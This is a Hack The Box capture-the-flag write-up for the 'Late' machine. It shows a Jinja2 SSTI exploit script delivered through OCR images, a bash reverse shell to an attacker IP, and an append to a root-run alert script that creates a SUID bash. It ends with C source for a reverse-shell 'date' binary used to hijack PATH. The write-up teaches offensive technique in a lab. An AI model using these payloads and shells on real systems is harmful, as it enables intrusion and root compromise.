# Late - HTB

[[_TOC_]]

# Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Late was an easy-rated, fun HTB machine created by [@kavigihan](https://twitter.com/_kavigihan)

We had to exploit an SSTI vulnerability in a flask application for foothold. It used an OCR library and rendered user-provided images as text, which allowed us to inject template syntax to get code execution.

Once on the box, we were expected to find a bash script which sent an alert email every time an SSH login was detected. We could modify that alert script to get arbitrary command execution as root.

# Initial Recon

## `nmap`

```console
opcode@parrot$ nmap -p- --min-rate 5000 10.10.11.156
Nmap scan report for 10.10.11.156
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN late.nmap 10.10.11.156
Nmap scan report for 10.10.11.156
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only SSH and HTTP ports are open on this machine.

## Exploring the website:

Upon visiting http://10.10.11.156/ in the browser, we are greeted with the landing page:

![1](images/1.png)

The webpage is about online image utilities. We can find a URL pointing to one of the utilities:  
http://images.late.htb/

Since we now have the domain name and a valid subdomain, let's add them to `/etc/hosts`:  
```console
opcode@parrot$ echo "10.10.11.156 late.htb images.late.htb" | sudo tee -a /etc/hosts
```

## gobuster

We can attempt to find more subdomains with `gobuster` in `vhost` mode:  
```console
opcode@parrot$ gobuster vhost -u http://late.htb/ -w cybersec/wordlists/subdomains-top1million-110000.txt
```
But it won't find anything new:  
```
Found: images.late.htb (Status: 200) [Size: 2187]
```

We can also use `gobuster` in `dir` mode to brute-force directories and files on the website:
```console
opcode@parrot$ gobuster dir -u http://images.late.htb/ -w cybersec/wordlists/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://images.late.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                cybersec/wordlists/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/24 09:30:06 Starting gobuster in directory enumeration mode
===============================================================
/scanner              (Status: 500) [Size: 290]
                                               
===============================================================
```

# Shell as user

## Optical Character Recognition

On http://images.late.htb/, we have a web application for Optical Character Recognition (OCR), which attempts to recognize text from any image we provide.  

![2](images/2.png)

The page also says that it is built with `flask`.

If we test for common web vulnerabilities, we can determine that this application is vulnerable to Server Side Template Injection (SSTI).  
If we upload an image containing `{{ 7*7 }}`, it sends back a file with the contents:
```
<p>49
</p>
```

My next step was to send it an image containing the standard Jinja2 SSTI payload for OS command injection:
```
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
```
It didn't work. Instead, we get an error message:
```
Error occured while processing the image: expected token 'end of print statement', got 'builtins'
```

With this error message, we can make an educated guess that the OCR cannot parse our image accurately.  
If we remove the curly brackets and send the rest of the payload, we'd find that our suspicions were on point:
```
<p>request.application. globals_._ builtins. import__(‘os').popen(‘id’).read()

</p>
```
Underscores are getting ignored or misinterpreted as spaces, and we can see several different kinds of quotes.

We will have to try various things to make it interpret our characters correctly.  
Taking screenshots, uploading them on the website and then reading the contents of downloaded files takes too long; hence I wrote a python script to take care of those steps.  
I used `requests` to manage uploads and downloads, and `Pillow` for generating the images containing the payloads:
```py
import requests
from PIL import Image, ImageDraw, ImageFont
from sys import argv, exit

url = 'http://images.late.htb'

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'

def gen_image(payload, font):
    # I want image size to be dependent on size of text
    # and text size is dependent on the font and font size
    # Unless there is an existing PIL.Image object, we cannot determine the text length
    # hence, I first created a dummy image, with dummy text
    dummy = Image.new(mode='L', size=(400, 400))
    dummy_draw = ImageDraw.Draw(dummy)
    t_width = round(dummy_draw.textlength(payload, font))
    t_height = font.size

    # Now, determine height and width for actual image
    width, height = t_width + 100, t_height + 200
    # The actual image
    im = Image.new(mode='L', size=(width, height), color=255)
    draw = ImageDraw.Draw(im)

    coords = (width-t_width)//2, (height-t_height)//2 - t_height//4
    draw.text(coords, payload, font=font)

    im.save('payload.png')

def gen_payload(command):
    fnt = ImageFont.truetype('Lato-Light.ttf', 40)
    # fnt = ImageFont.truetype('Cantarell-Regular.otf', 40)
    payload = f'request.application.__globals__.__builtins__.__import__(\'os\').popen(\'{command}\').read()'
    payload = '{{' + payload + '}}'
    gen_image(payload, fnt)

def upload_img():
    with open('payload.png', 'rb') as f:
        imagedata = f.read()

    file = {'file': ('payload.png', imagedata, 'image/png')}
    r = requests.post(url + '/scanner', files=file, proxies=proxy)
    return r

if __name__ == "__main__":
    if len(argv) == 2:
        gen_payload(argv[1])
        resp = upload_img()
        print(resp.text)

    else:
        print(f'[!] Usage example:')
        print(f'[-] python3 {argv[0]} \'ls -la\'\n')
        exit()
```

I chose a random font and a random font size.  
If we run the script, we get the error:
```console
opcode@parrot$ python3 automate.py 'id'
Error occured while processing the image: unexpected char '‘' at 73
```

We can also look at the image it generated:

![3](images/3.png)

Let's think about all the things that could go wrong:  
- We must avoid using double quotes as much as possible, as they might get interpreted as two single quotes and break our payload.  
- Underscores are getting ignored or misinterpreted as spaces. Perhaps we need to find a font with very noticeable kerning.  
- And lastly, `'` may also get interpreted as other kinds of quotes. We'll have to test if serif fonts or sans serif fonts are more OCR-friendly.

If we google "optimal font for OCR", we'd be led to the font **OCR-A**  
But if we use this one, we get the error:
```
Error occured while processing the image: unexpected char '—' at 26
```
Once we look at the image containing our payload, the reason for failure would become very obvious:

![4](images/4.png)

This font is not ideal for our use case.

Since this is a flask application, we can assume it uses `pytesseract` or a similar library.  
We can find the fonts it used for training on their GitHub repo: https://github.com/tesseract-ocr/tesseract/blob/4.1/src/training/language-specific.sh#L43  
They have used a bunch of serif fonts as well as sans serif fonts.

I also found an article about improving the output quality (https://tesseract-ocr.github.io/tessdoc/ImproveQuality.html), but it's all about pre-processing and is primarily relevant to printed text.  
It says that ideally, we want a DPI of at least 300.  
It also links to an interesting article: https://groups.google.com/d/msg/tesseract-ocr/Wdh_JJwnw94/24JHDYQbBQAJ  
The author makes an interesting observation: **there is an optimum letter size (30-33 pixels) for minimum error rate**

Let us modify our python script to use letter size of 32 pixels (by simply changing the font size to 32).

To fix the underscore issue, I looked at default fonts on my parrot machine in `/usr/share/fonts/truetype` and `/usr/share/fonts/opentype`. I found that double underscores in the `Cantarell-Regular` font were much more visible than other fonts.

Even with all that, I still got this error:
```console
opcode@parrot$ python3 automate.py 'id'
Error occured while processing the image: unexpected char '‘' at 73
```
The 73rd position is the last quote in our payload:
```
request.application.__globals__.__builtins__.__import__('os').popen('id').read()
```

I decided to make more space and changed my payload to:
```py
payload = f'request.application.__globals__.__builtins__.__import__( \'os\' ).popen( \' {command} \' ).read()'
```

Now, it works flawlessly. I changed my code to strip off the output's `<p>` tags.  
You can find the final version of this python script [here](automate.py)
We can run any commands now:
```console
opcode@parrot$ python3 automate.py 'id'
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
```

```console
opcode@parrot$ python3 automate.py 'ls -la'
total 36
drwxrwxr-x 7 svc_acc svc_acc 4096 Apr  4 13:28 .
drwxr-xr-x 7 svc_acc svc_acc 4096 Apr  7 13:51 ..
-rw-r--r-- 1 svc_acc svc_acc 1765 Apr  4 12:58 main.py
drwxr-xr-x 2 svc_acc svc_acc 4096 Apr 24 06:50 misc
drwxr-xr-x 2 root    root    4096 Apr  4 12:59 __pycache__
drwxr-xr-x 7 svc_acc svc_acc 4096 Jan  6  2022 static
drwxr-xr-x 2 svc_acc svc_acc 4096 Jan  6  2022 templates
drwxr-xr-x 2 svc_acc svc_acc 4096 Apr 24 06:50 uploads
-rw-r--r-- 1 svc_acc svc_acc  104 Apr  4 12:58 wsgi.py
```

```console
opcode@parrot$ python3 automate.py 'cat /etc/passwd | grep bash'
root:x:0:0:root:/root:/bin/bash
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
```

We can attempt to get a reverse shell with:
```console
opcode@parrot$ python3 automate.py 'bash -c "bash -i >& /dev/tcp/10.10.14.9/9001 0>&1"'
```
I was slightly worried about the double quotes, but it works just fine:
```
listening on [any] 9001 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.156] 53552
bash: cannot set terminal process group (1220): Inappropriate ioctl for device
bash: no job control in this shell
svc_acc@late:~/app$ 
```

We can read the user flag with this account.

# Shell as root

## `linpeas` and `pspy`

As usual, I ran `linpeas` on this box after getting a shell.  
Some results in `linpeas` output are worth noting.

![5](images/5.png)

It can be helpful if we find a cron job or SUID binary that runs another binary without using its absolute path. We can impersonate that binary by placing a malicious binary with the same name at one of the paths specified in $PATH.

![6](images/6.png)

Like the last one, we can exploit this if absolute paths are not used in service configurations.

![7](images/7.png)

I wonder what that `sendmail` cron job is about.

![8](images/8.png)

Besides the expected ports, we also have SMTP ports (25 and 587) available internally.

![9](images/9.png)

A private SSH key is available in `/home/svc_acc/.ssh/`. We can use it to connect to the box with SSH.

![10](images/10.png)

Weirdly, we own the `/usr/local/sbin` directory.  
```console
svc_acc@late:~$ ls -la /usr/local/sbin
total 12
drwxr-xr-x  2 svc_acc svc_acc 4096 Apr 24 07:27 .
drwxr-xr-x 10 root    root    4096 Aug  6  2020 ..
-rwxr-xr-x  1 svc_acc svc_acc  433 Apr 24 07:27 ssh-alert.sh
```

The contents of `ssh-alert.sh`:
```bash
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
```

It sends a mail to `root` if an SSH login is detected.

Let's catch the process for this script in `pspy`.  
I'll SSH to the machine using that `id_rsa`:
```console
opcode@parrot$ ssh -i id_rsa svc_acc@late.htb
```

We can immediately see a bunch of processes in `pspy`:
```
2022/04/24 07:34:51 CMD: UID=0    PID=24911  | /usr/sbin/sshd -D -R 
2022/04/24 07:34:51 CMD: UID=110  PID=24912  | sshd: [net]          
2022/04/24 07:34:52 CMD: UID=0    PID=24913  | sshd: svc_acc [priv] 
2022/04/24 07:34:52 CMD: UID=0    PID=24914  | date 
2022/04/24 07:34:52 CMD: UID=0    PID=24916  | /bin/bash /usr/local/sbin/ssh-alert.sh 
2022/04/24 07:34:52 CMD: UID=0    PID=24917  | sendmail: MTA: 26SHc5S8024992 localhost.localdomain [127.0.0.1]: DATA
2022/04/24 07:34:52 CMD: UID=0    PID=24918  | sensible-mda svc_acc@new root  127.0.0.1 
2022/04/24 07:34:52 CMD: UID=0    PID=24919  | sendmail: MTA: ./26SHc5S8024992 from queue     
```

We also note a separate set of cron jobs running every minute with root privileges:
```
2022/04/24 07:35:01 CMD: UID=0    PID=24938  | /bin/bash /root/scripts/cron.sh 
2022/04/24 07:35:01 CMD: UID=0    PID=24937  | /bin/sh -c /root/scripts/cron.sh 
2022/04/24 07:35:01 CMD: UID=0    PID=24936  | /usr/sbin/CRON -f 
2022/04/24 07:35:01 CMD: UID=0    PID=24941  | cp /root/scripts/ssh-alert.sh /usr/local/sbin/ssh-alert.sh 
2022/04/24 07:35:01 CMD: UID=0    PID=24943  | chown svc_acc:svc_acc /usr/local/sbin/ssh-alert.sh 
2022/04/24 07:35:01 CMD: UID=0    PID=24944  | chattr +a /usr/local/sbin/ssh-alert.sh 
2022/04/24 07:35:01 CMD: UID=0    PID=24945  | rm -r /home/svc_acc/app/misc/* 
```

The script `/usr/local/sbin/ssh-alert.sh` is being run with root privileges, and we own that file.  
It seems to be an easy win. But if we try to edit the file, it says, "Error writing ssh-alert.sh: Operation not permitted".  
We cannot delete the file either.  
It is due to that `chattr +a /usr/local/sbin/ssh-alert.sh` command we saw in `pspy`

We could have also used `lsattr` on the file to list its attributes:
```console
svc_acc@late:/usr/local/sbin$ lsattr ssh-alert.sh 
-----a--------e--- ssh-alert.sh
```
The `a` flag is set, which implies that the file can only be opened in append mode for writing. We should be able to append lines to it.  
We can append an OS command that transfers bash to `/tmp` and makes it a SUID binary:
```console
svc_acc@late:~$ echo 'cp /bin/bash /tmp/chisel; chmod u+s /tmp/chisel' >> /usr/local/sbin/ssh-alert.sh
```

Now, we can SSH to the box again:
```console
opcode@parrot$ ssh -i id_rsa svc_acc@late.htb
```

Let's check the `/tmp` directory now:
```console
svc_acc@late:~$ ls -la /tmp/chisel 
1088 -rwsr-xr-x 1 root root 1113504 Apr 24 08:13 /tmp/chisel
```
The permissions are correct. Running it with `-p` flag would give us a privileged shell. 
The `-p` flag ensures that the effective id is not reset.
```console
svc_acc@late:~$ /tmp/chisel -p
chisel-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)
```

And that's the root for us.

## Alternate approach - Impersonate `date` binary

If the machine was slightly more hardened and didn't allow us to edit `/usr/local/sbin/ssh-alert.sh`, we could still have placed a malicious `date` or `uname` binary at a path specified in `$PATH` to get root.

As `linpeas` pointed out earlier, the initial paths in `$PATH` are directories that we have write access to
```console
svc_acc@late:~$ echo $PATH
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

The script `/usr/local/sbin/ssh-alert.sh` is run with root privileges and calls two binaries without using their absolute paths: `date` and `uname`.

We can create a malicious `date.c`, which contains a reverse shell:
```c
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
int main()
{
    int sockfd;
    int port = 9001;

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr("10.10.14.9");

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    connect(sockfd, (struct sockaddr *) &addr, sizeof(addr));
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);
    execve("/bin/sh", NULL, NULL);
    return 0;
}
```

Let's compile it:
```console
opcode@parrot$ gcc -Wall date.c -o date
```
Next, transfer this `date` binary to the box.

We can put it in `/usr/local/sbin` as we own that directory:
(Note that I used `/usr/local/sbin` and not `/home/svc_acc/.local/bin` because it is very unlikely for the latter to be in `root`'s `$PATH`)
```console
svc_acc@late:/tmp$ cp date /usr/local/sbin/
svc_acc@late:/tmp$ which date
/usr/local/sbin/date
```

We can start a `netcat` listener and SSH to the box again:
```console
opcode@parrot$ ssh -i id_rsa svc_acc@late.htb
```
And we get a shell as root:
```
listening on [any] 9001 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.156] 37402
id
uid=0(root) gid=0(root) groups=0(root)
```
